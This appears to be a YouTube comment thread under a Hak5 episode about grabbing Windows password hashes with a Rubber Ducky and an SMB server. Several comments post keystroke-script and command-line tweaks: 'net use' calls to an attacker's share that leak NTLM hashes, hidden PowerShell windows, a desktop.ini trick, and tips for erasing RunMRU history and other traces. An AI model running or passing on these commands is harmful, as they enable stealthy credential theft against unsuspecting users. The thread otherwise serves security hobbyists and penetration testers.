2 Second Password Hash Hack - Hak5 2102

แชร์
ฝัง
  • เผยแพร่เมื่อ 28 พ.ย. 2024

ความคิดเห็น •

  • @MtSaEt
    @MtSaEt 8 ปีที่แล้ว +9

    Well, since you guys said it... I got it down to 0.5 seconds ....... \o/

  • @buerger3
    @buerger3 8 ปีที่แล้ว +17

    Why do you use the Explorer to connect to the share and not the net use command?
    That way no Explorer window pops up :D

    • @DarrenKitchen
      @DarrenKitchen 8 ปีที่แล้ว +6

      Great point - and I have no idea why I didn't think about that... Thanks!

    • @buerger3
      @buerger3 8 ปีที่แล้ว

      no problem :D

    • @rootshell
      @rootshell 8 ปีที่แล้ว

      there is a micro SD card slot on the surface

    • @Starfire42
      @Starfire42 8 ปีที่แล้ว +5

      You can then do "net use /DELETE \\ipaddress" directly afterwards and not leave anything listed if they against all odds do a "net use". Cleanup is king.

    • @DenysVitali
      @DenysVitali 8 ปีที่แล้ว +1

      I was wondering the exact thing

  • @codeartha
    @codeartha 8 ปีที่แล้ว +2

    now at the end of your script add:
    taskkill /F /IM explorer.exe>nul
    start explorer.exe
    might wanna add some delays to make sure it works. (They'll just think windows crashed again :D )

  • @jamarallen08
    @jamarallen08 8 ปีที่แล้ว

    Looking everywhere for a Hak5 field kit. There was only 3 at BSides Augusta that they were raffling off. I just knew that was the last time I would see them. Wish I was one of the fortunate ones.

  • @robprupe
    @robprupe 8 ปีที่แล้ว

    Question for Darren, what ducky scripts work when WIN+R is disabled for all the machines on the network?

  • @amitrathore3321
    @amitrathore3321 8 ปีที่แล้ว

    Shannon, What is mini device with you , Mini device Right Hand side- Which model

  • @Babyfacemcgill
    @Babyfacemcgill 8 ปีที่แล้ว

    What about if you force NTLMv2? Also, Windows 10 has credential guard that is supposed to mitigate pass the hash vulnerabilities. Have you tried on Windows 10?

  • @franklivi4249
    @franklivi4249 6 ปีที่แล้ว

    I did this with a VBS script and got it in around .45 sec, nice video love you guys so much and keep doing whatever you are doing :)

    • @gamingguy2018
      @gamingguy2018 5 ปีที่แล้ว

      Rusty Anera Can I please have the script?

  • @gonespral
    @gonespral 8 ปีที่แล้ว +7

    +Hak5 +Hak5Darren where can I find the wifi pineappling book for sale?

    • @DarrenKitchen
      @DarrenKitchen 8 ปีที่แล้ว +5

      It'll be in the HakShop next week

    • @gonespral
      @gonespral 8 ปีที่แล้ว

      +Darren Kitchen thank you

    • @AlphaZeroOmega
      @AlphaZeroOmega 8 ปีที่แล้ว +1

      Haha! I was wondering the same thing myself! Couldn't find it in the shop.

  • @AtariKafa
    @AtariKafa 8 ปีที่แล้ว +5

    Awesome show

    • @GamehunterKaan
      @GamehunterKaan 3 ปีที่แล้ว +1

      Hacker olduğunu bilmiyordum :D

  • @MultiMegaMaxx
    @MultiMegaMaxx 8 ปีที่แล้ว

    Could you not put a samba server in the cloud, and use a turtle to then vpn into that box, or would that not work. Not sure how the subnetting would function

  • @airwalk699
    @airwalk699 8 ปีที่แล้ว

    Where can we get the WiFi Pineapple book? I don't see it at the Hak Shop.

  • @ByteBitten
    @ByteBitten 8 ปีที่แล้ว

    +Hak5, what is the little device at the back of the table you guys keep touching?
    Looks like a GPD Win, but I can't tell for sure...
    [edit] Saw it at TekThings, not a GPD Win... but what else?!?

  • @timmehwimmy
    @timmehwimmy 8 ปีที่แล้ว +2

    The Lan turtle should get the SMB server as a module...

  • @ericgarza283
    @ericgarza283 8 ปีที่แล้ว

    Hi there, what kind of hash is that? It is separeted by ":", so wich one is? Great video!

  • @EricBaileyDrums
    @EricBaileyDrums 8 ปีที่แล้ว +1

    You can also close an Explorer window with Ctrl+W

  • @michaelburrier
    @michaelburrier 8 ปีที่แล้ว +2

    You could just use Powershell to browse the share instead of explorer and it will close by itself when done. Something like cmd /c start /min powershell "dir share"

    • @TheWP
      @TheWP 8 ปีที่แล้ว +2

      Tried this and it takes time to output the contents of the remote directory, so there's more than just initiating a connection going on there. I have a pushd / popd method in my comment above which works in something like 200ms, but I'm sure something similar could be done with PowerShell (assuming PS hasn't been disabled by the admins).

  • @b.o.780
    @b.o.780 6 ปีที่แล้ว

    In windows 10 you need add the option "-smb2support" to the smbserver tool cause the smb1 protocol is disabled there by default

  • @Daniel_Dizzy
    @Daniel_Dizzy 8 ปีที่แล้ว +1

    Daren owned the show today. Snubs learn samba.

    • @hak5
      @hak5  8 ปีที่แล้ว +22

      I actually already knew samba (duh), but we do this thing called Watsoning, where one host asks questions for the audience while the other answers. If you've ever seen Sherlock, you've seen this in action. - Shannon

  • @msven
    @msven 8 ปีที่แล้ว

    Yep....need more Rubber Duckies....Ordering another right now.

  • @iFunkMasterJ
    @iFunkMasterJ 8 ปีที่แล้ว

    Couldn't you restart explorer to get rid of the open windows?

  • @richn1419
    @richn1419 8 ปีที่แล้ว

    So Darren, great series - I'm a fan! I have a tetra, nano and a ducky.... I want the Pineapple book! Where do I find it? I checked the interwebs - can't see it...

  • @themaconeau
    @themaconeau 8 ปีที่แล้ว

    What's the deal with using VMWare Workstation?

  • @j0ltc0lajunki3
    @j0ltc0lajunki3 8 ปีที่แล้ว

    That Pineapple Mod, so awesome.

  • @Paranoidhaze
    @Paranoidhaze 8 ปีที่แล้ว

    Any update/ETA on the Nano in your EU Store?

  • @FFVison
    @FFVison 8 ปีที่แล้ว

    "net use" can be used to connect to a smb share from the command line. This way you don't have to worry about figuring out how to close explorer using the ducky.
    I just got to thinking that if you had access to a domain controller, you could edit the group policy to run something like the equivalent of the ducky script from before to grab clear text credentials and send them elsewhere. I'm thinking that when someone signs into a domain, they probably don't think much of a command prompt window that opens minimized and then disappears. Then again, if you have direct access to the DC, there might be easier ways to get to the passwords, but possibly not in plain text. At that point, you would have to attack hashes. Assuming you could compromise a domain admin account, you could do this. Again, probably better ways to do this, but I just wanted to share what I was just thinking.

  • @Bisynchronous
    @Bisynchronous 8 ปีที่แล้ว

    Awesome video guys! What's the small pocket PC in the back? Never seen that one before.
    Keep up the awesome videos!

    • @relik0fages
      @relik0fages 8 ปีที่แล้ว

      He used it in a previous video. Last season I believe.

  • @eutimputnoki6912
    @eutimputnoki6912 8 ปีที่แล้ว

    So how do i decode a hash like this? didn't really understood it.

  • @thexeon
    @thexeon 7 ปีที่แล้ว

    lol --- why are you using VMWare when your copy of Windows supports Hyper-V which has docker support?

  • @sw1tchbl4d36
    @sw1tchbl4d36 8 ปีที่แล้ว

    what do u do with the hashes once you have captured them

  • @prinsu99
    @prinsu99 8 ปีที่แล้ว +1

    just got done rewriting the ducky script in vbs and put it on a cd with autorun

  • @sw1tchbl4d36
    @sw1tchbl4d36 8 ปีที่แล้ว

    does it only work on port 445 or can you change it in a config file and then port forward it to get passwords from any where

    • @4ickyy
      @4ickyy 8 ปีที่แล้ว

      No. Samba port cannot be changed on Windows. Opening a share will default to 445 and you cannot open a share on another port.

    • @sw1tchbl4d36
      @sw1tchbl4d36 8 ปีที่แล้ว

      damn

  • @josecintron85
    @josecintron85 8 ปีที่แล้ว

    Anyone know if there is a LANTurtle module to run the SMBServer from Impaket

  • @schwarz500
    @schwarz500 8 ปีที่แล้ว

    Hello Can you bring Back the usb Rubber ducky in the europe hakshop?
    thank you

  • @DimusTech
    @DimusTech 8 ปีที่แล้ว

    Shannon, is that an XPS 13 or 15?

    • @hak5
      @hak5  8 ปีที่แล้ว +2

      13

    • @DimusTech
      @DimusTech 8 ปีที่แล้ว

      If you are using Windows 10, did you ever achieved more than around 70% of CPU usage? I've never seen mine going there even when I tried to.

  • @Andreas-gh6is
    @Andreas-gh6is 8 ปีที่แล้ว

    What do you do when the client has disabled cmd and command execution for all accessible users?

  • @c0deoustech
    @c0deoustech 8 ปีที่แล้ว

    Any idea when the LAN turtle will be back in stock?

    • @nicksmith6629
      @nicksmith6629 8 ปีที่แล้ว

      its back, just about to grab one but im waiting for the hak5 kit instead

  • @Just4YoutubeDE
    @Just4YoutubeDE 8 ปีที่แล้ว

    Well done hak5 Team,
    but i would use Powershell
    powershell -noprofile -windowstyle hidden {access to \\10.10.1.1 or payload}

  • @testertester3128
    @testertester3128 8 ปีที่แล้ว

    What kind of hash is that?

  • @Ajediday
    @Ajediday 8 ปีที่แล้ว

    Correction: Bo didn't give you the stickers, I did. Also the USB Rubber Duck I adopted is doing finel, Fred gets along very well with Tommy the Lan Turtle.

    • @deepakvaishnav9780
      @deepakvaishnav9780 3 ปีที่แล้ว

      Hey tell me why didn't we erase the browsing history of runline in this case like we did last week's episode of rubber ducky with minikatz

  • @joshuavillwo
    @joshuavillwo 8 ปีที่แล้ว +1

    Your talk about putting something "legit" on that share got me thinking..... Don't minimize it at all! Instead:
    MAKE IT LOOK LIKE THE FLASH DRIVE
    The user is going to be suspicious that the "USB Drive" didn't pop up. So why not make the share look like the contents of the flash drive?!

  • @azaellawson3620
    @azaellawson3620 7 ปีที่แล้ว

    How would one crack said hashes?

  • @marvin.t4emblem185
    @marvin.t4emblem185 8 ปีที่แล้ว +1

    I want your tshirt... Looks amazing

  • @c0deoustech
    @c0deoustech 8 ปีที่แล้ว

    The problem with running the entire command within the run box is that the command history is left behind - not great for more tech savvy targets. Could just go with opening cmd and going from there. It would increase time of course but ultimately leave behind less evidence

    • @OurLittleTurtle
      @OurLittleTurtle 8 ปีที่แล้ว +3

      Or you could add a couple lines of code and delete the command history in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

  • @NemanjaDjurcic
    @NemanjaDjurcic 8 ปีที่แล้ว

    How about some MS office macro hacking or something like that?

  • @SanAltGaming
    @SanAltGaming 8 ปีที่แล้ว

    No need to get into explore. Net use is way quicker. Problem is that all of these calls and attacks can be traced back if those computers are in a domain. So I wouldn't use this in a corperate environment.

  • @patrickm500
    @patrickm500 8 ปีที่แล้ว

    Unless it's been resolved, the first time a ducky is inserted into a windows machine it takes anywhere from 30-90 seconds for windows to find and install HID drivers (the ducky is not USB). This has to be accounted for with a huge delay setting or the script will fire before the device is available, and fail.
    So... in a real world setting how are you guys getting a 2 second execution :)

    • @hardreset5074
      @hardreset5074 8 ปีที่แล้ว +1

      well, actually you don't need a ducky for this. you need a thumb drive with a directory and a desktop.ini in it.
      With a modification to the desktop.ini the authentication happens instantly when the explorer is opened by the user.

    • @patrickm500
      @patrickm500 8 ปีที่แล้ว

      +Hard Reset Hmmm..you're absolutely right, that's an excellent way of accomplishing it!

  • @MistiCato
    @MistiCato 8 ปีที่แล้ว

    Currently going thru a Voyager re-watch on Netflix now. :)

    • @j0ltc0lajunki3
      @j0ltc0lajunki3 8 ปีที่แล้ว

      TNG Currently *Yay Canadian Netflix got it back*, then DS9 or Voyager.

  • @judgesh
    @judgesh 8 ปีที่แล้ว

    Great job, will try out this with my ducky.

  • @echy5
    @echy5 8 ปีที่แล้ว

    what are credentials?

  • @benjaminb1337
    @benjaminb1337 8 ปีที่แล้ว

    Do something with the teensy please.

  • @candice4315
    @candice4315 7 ปีที่แล้ว

    would i need a vmalware station

  • @Compl.exemotions
    @Compl.exemotions 8 ปีที่แล้ว

    wait what's "hacking"?

  • @remyleouf
    @remyleouf 7 ปีที่แล้ว

    How about making one for mac :D

  • @MR.MARIO_DEV
    @MR.MARIO_DEV ปีที่แล้ว

    How to crack this hash ??

  • @ryan.1990
    @ryan.1990 8 ปีที่แล้ว +17

    How many times do you reckon this guy's been rejected by her?

    • @colonelbaaah8735
      @colonelbaaah8735 8 ปีที่แล้ว +25

      i'd say his chances are better than yours

    • @your_boy_lamine
      @your_boy_lamine 8 ปีที่แล้ว +1

      why you gotta burn him like that

    • @Tvl20
      @Tvl20 8 ปีที่แล้ว +2

      probably OVER 9000 (times)!!

    • @ryan.1990
      @ryan.1990 8 ปีที่แล้ว

      バカなの Why do you say that?

    • @Cpt_Exploit
      @Cpt_Exploit 8 ปีที่แล้ว +3

      Savage

  • @rogo7330
    @rogo7330 ปีที่แล้ว

    So many hacks could be solved just by not allowing random USB things automatically become devices in system... Probably should invest some time in this to harden my setup.

  • @tzisorey
    @tzisorey 8 ปีที่แล้ว

    Don't forget to clear any evidence from the MRU's when you finish ..ahem.. testing the system.

  • @tehtron
    @tehtron 8 ปีที่แล้ว

    Load PSkill on the remote share and you can kill the explorer session

  • @0000xFFFF
    @0000xFFFF 6 ปีที่แล้ว

    press CTRL + W to close explorer window

  • @captaincarl1
    @captaincarl1 8 ปีที่แล้ว

    Is there a reason this video is over 26 minutes?

  • @itsdarklikehell
    @itsdarklikehell 8 ปีที่แล้ว +3

    quickest way to get hash is to ask any random rasta for his local hashish dealer, i though you knew that by now darren...

  • @antfry256
    @antfry256 8 ปีที่แล้ว

    Good episode, thanks :)

  • @grave0x
    @grave0x 8 ปีที่แล้ว +1

    cmd /C "start /MIN explorer \\localhost" taskkill \im explorer.exe this would be less detected

    • @cripplingdepression8889
      @cripplingdepression8889 8 ปีที่แล้ว +1

      It would but there is a way faster way to do it
      Using the commandline net use you can run it minimized in a self destructing cmd using:
      DELAY 1000
      GUI r
      DELAY 200
      STRING cmd /c start /min net use \\$ipaddress ^&exit
      If the samba server is already running, it will work under 2 seconds (but it leaves evidence behind in the run bar)

    • @grave0x
      @grave0x 8 ปีที่แล้ว

      Eliott Castafolte nice but your missing quotes

  • @geoffhalsey2184
    @geoffhalsey2184 8 ปีที่แล้ว

    What a super hack and so simple!

  • @deepakvaishnav9780
    @deepakvaishnav9780 3 ปีที่แล้ว

    Why didn't we erase the history as we did last week??

  • @crzren
    @crzren 8 ปีที่แล้ว +1

    *runs and hides behind evil server*

  • @jimbob5188
    @jimbob5188 8 ปีที่แล้ว

    the girl with the Faraday cage

  • @draguve3821
    @draguve3821 8 ปีที่แล้ว

    have you guys checked out droidducky?

  • @cyberjack
    @cyberjack 8 ปีที่แล้ว

    easyer just to crack the SMB login with hydra

  • @rek2hispagatos498
    @rek2hispagatos498 8 ปีที่แล้ว +1

    smb = 445 not 4445. "135/139/445" the evil trias! :P

  •  8 ปีที่แล้ว

    Nice work.

  • @johncullen9663
    @johncullen9663 7 ปีที่แล้ว

    ./smbserver.py -comment 'test-share' TMP /tmp/
    Traceback (most recent call last):
    File "./smbserver.py", line 24, in
    logger.init()
    AttributeError: 'module' object has no attribute 'init'

  • @SecurityTalent
    @SecurityTalent 2 ปีที่แล้ว

    Thanks

  • @MuhammadKhizerJaved
    @MuhammadKhizerJaved 7 ปีที่แล้ว

    I need those stickers 😂 please

  • @lucan73630
    @lucan73630 7 ปีที่แล้ว +2

    I love the videos, but can you please make some shorter videos. I don't want to watch a full 30 min video

  • @MuhammadKhizerJaved
    @MuhammadKhizerJaved 7 ปีที่แล้ว

    17:30 😂😂😂

  • @sibincic1
    @sibincic1 7 ปีที่แล้ว

    thanks! you guys are so badass ツ

  • @flmadero
    @flmadero 6 หลายเดือนก่อน

    I get it, now on duty

  • @aethersmith4830
    @aethersmith4830 7 ปีที่แล้ว

    Gone in two seconds =)

  • @tetaguila7841
    @tetaguila7841 8 ปีที่แล้ว

    cool!

  • @aslamhussain9627
    @aslamhussain9627 2 ปีที่แล้ว

    Kikiki

  • @rangergames8349
    @rangergames8349 6 ปีที่แล้ว

    plz hack roblox accounts

  • @sine0
    @sine0 8 ปีที่แล้ว

    Freudian: th-cam.com/video/BH4M7djZfew/w-d-xo.html

  • @davidshields8401
    @davidshields8401 5 ปีที่แล้ว

    Too much waffle. Please get to the point.

  • @Aemilindore
    @Aemilindore 8 ปีที่แล้ว

    First!

  • @mohteshamjibran
    @mohteshamjibran 8 ปีที่แล้ว +1

    first lol